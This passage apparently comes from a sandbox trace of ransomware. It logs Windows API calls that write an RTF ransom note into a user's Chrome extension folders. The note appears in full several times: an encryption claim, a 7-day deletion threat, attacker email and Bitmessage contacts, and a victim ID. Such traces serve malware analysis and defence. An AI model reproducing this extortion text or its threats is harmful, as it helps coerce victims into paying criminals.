INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.281] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.282] CloseHandle (hObject=0x2c8) returned 1 [0280.282] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0280.282] GetLastError () returned 0x2 [0280.282] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR 